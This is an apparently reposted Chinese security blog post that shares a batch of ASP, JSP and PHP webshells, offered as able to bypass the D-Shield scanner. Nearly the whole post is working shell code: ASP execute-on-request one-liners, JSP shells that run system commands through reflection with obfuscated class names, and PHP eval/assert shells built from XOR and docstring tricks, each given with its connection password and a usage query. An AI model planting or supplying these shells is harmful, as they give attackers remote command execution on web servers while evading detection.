分享一批asp、jsp、php小马,当前时间都可过d盾

  • A+
所属分类:安全文章

文章来源:极安中国

原作者:h88z

https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637

逛论坛的时候发现大佬们好多优秀的文章分享一批asp、jsp、php小马,当前时间都可过d盾

骚思路也是很多,都值得我们去参考学习分享一批asp、jsp、php小马,当前时间都可过d盾

站在巨人的肩膀上学习!

0x01 ASP

ASP连接密码均为99999

<%dim a(5)a(0)=request("99999")eXecUTe(a(0))%>


分享一批asp、jsp、php小马,当前时间都可过d盾

<%Function b():    b = request("99999")End FunctionFunction f():    eXecUTe(b())End Functionf()%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%Class zzz
private yyy Private Sub Class_Initialize yyy = "" End Sub public property let www(yyy) execute(yyy) end property
End Class
Set xxx= New zzzdim vvv(7)vvv(2)=request("99999")xxx.www= vvv(2)%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%Function x():    x = request("99999")End Functiony = Mid(x(),1)z =y&""eXecUTe(z)%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%Function x():    x = request("99999")End Functiony = Left(x(),99999)eXecUTe(y)%>

 

0x02 JSP

jsp连接密码均为x

 

<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString reverseStr(String str){String reverse = "";int length =str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) +reverse;}return reverse;}%><%String x =request.getParameter("x");if(x!=null){    Class rt =Class.forName(reverseStr("emitnuR.gnal.avaj"));    Method gr =rt.getMethod(reverseStr("emitnuRteg"));    Method ex =rt.getMethod(reverseStr("cexe"), String.class);    Process e = (Process)ex.invoke(gr.invoke(null),  x);    java.io.InputStream in =e.getInputStream();    int a = -1;    byte[] b = new byte[2048];    out.print("");    while((a=in.read(b))!=-1){        out.println(new String(b));    }    out.print("");}%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString plusStr(String str){String plus = "";int length =str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}elseif(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}else{plus=plus+z;}}returnplus;}%><%String x =request.getParameter("x");if(x!=null){    Class rt =Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));    Method gr =rt.getMethod(plusStr("dbqRrkqfjb"));    Method ex =rt.getMethod(plusStr("bubz"), String.class);    Process e = (Process)ex.invoke(gr.invoke(null),x);    java.io.InputStream in =e.getInputStream();    int a = -1;    byte[] b = new byte[2048];    out.print("");    while((a=in.read(b))!=-1){        out.println(new String(b));    }    out.print("");}%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString eStr(String str){String result = "";int length =str.length();for (int i = 0; i < length; i++){charz=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%><%if(request.getParameter("x")!=null){Classrt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));Process e =(Process) rt.getMethod(new String(eStr("j}jh")),String.class).invoke(rt.getMethod(newString(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}),request.getParameter("x") );java.io.InputStreamin = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("");while((a=in.read(b))!=-1){out.println(newString(b));}out.print("");}%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<%@ pagelanguage="java" import="java.util.*,java.io.*"pageEncoding="UTF-8"%><%!u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u0053u0074u0072u0069u006eu0067u0020u0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0053u0074u0072u0069u006eu0067u0020u0063u0029u0020u007bu0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0020u006cu0069u006eu0065u0020u003du0020u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0028u0029u003bu0074u0072u0079u0020u007bu0050u0072u006fu0063u0065u0073u0073u0020u0070u0072u006fu0020u003du0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u0063u0029u003bu0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0075u0066u0020u003du0020u006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0070u0072u006fu002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u0029u0029u003bu0053u0074u0072u0069u006eu0067u0020u0074u0065u006du0070u0020u003du0020u006eu0075u006cu006cu003bu0077u0068u0069u006cu0065u0020u0028u0028u0074u0065u006du0070u0020u003du0020u0062u0075u0066u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0074u0065u006du0070u002bu0022u005cu006eu0022u0029u003bu007du0062u0075u0066u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0020u0063u0061u0074u0063u0068u0020u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0065u002eu0067u0065u0074u004du0065u0073u0073u0061u0067u0065u0028u0029u0029u003bu007du0072u0065u0074u0075u0072u006eu0020u006cu0069u006eu0065u002eu0074u006fu0053u0074u0072u0069u006eu0067u0028u0029u003bu007d%><%u0069u0066u0028u0022u0039u0035u0032u0037u0037u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0026u0026u0021u0022u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0029u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003cu0070u0072u0065u003eu0022u002bu0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u0066u0074u006du0069u0064u0022u0029u0029u002bu0022u003cu002fu0070u0072u0065u003eu0022u0029u003bu007du0065u006cu0073u0065u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003au002du0029u0022u0029u003bu007d%>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

使用方法:

?peciwid=95277&cftmid=id

 

0x03 PHP

php连接密码均为1

 

<?php$a=end($_REQUEST);eval($a);?>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<?php$a =substr_replace("asse00","rt",4);$b=array($array=array(''=>$a($_GET['1'])));var_dump($b);?>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<?php     /**      * assert($_GET[1+0]);    */     class User { }     $user = new ReflectionClass('User');    $comment = $user->getDocComment();    $d = substr($comment , 14 , 20);    assert($d);?>

 

分享一批asp、jsp、php小马,当前时间都可过d盾

<?php' v. N&N- O& ]; v9 N! m9 y: {; J$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');// $_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';$___=$$__;$_($___[pwd]); //assert($_POST[_]);?>

0x04 分享来源

https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗分享一批asp、jsp、php小马,当前时间都可过d盾

往期文章有彩蛋哦分享一批asp、jsp、php小马,当前时间都可过d盾

分享一批asp、jsp、php小马,当前时间都可过d盾

一如既往的学习,一如既往的整理,一如即往的分享。分享一批asp、jsp、php小马,当前时间都可过d盾

如侵权请私聊公众号删文


本文始发于微信公众号(渗透Xiao白帽):分享一批asp、jsp、php小马,当前时间都可过d盾

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: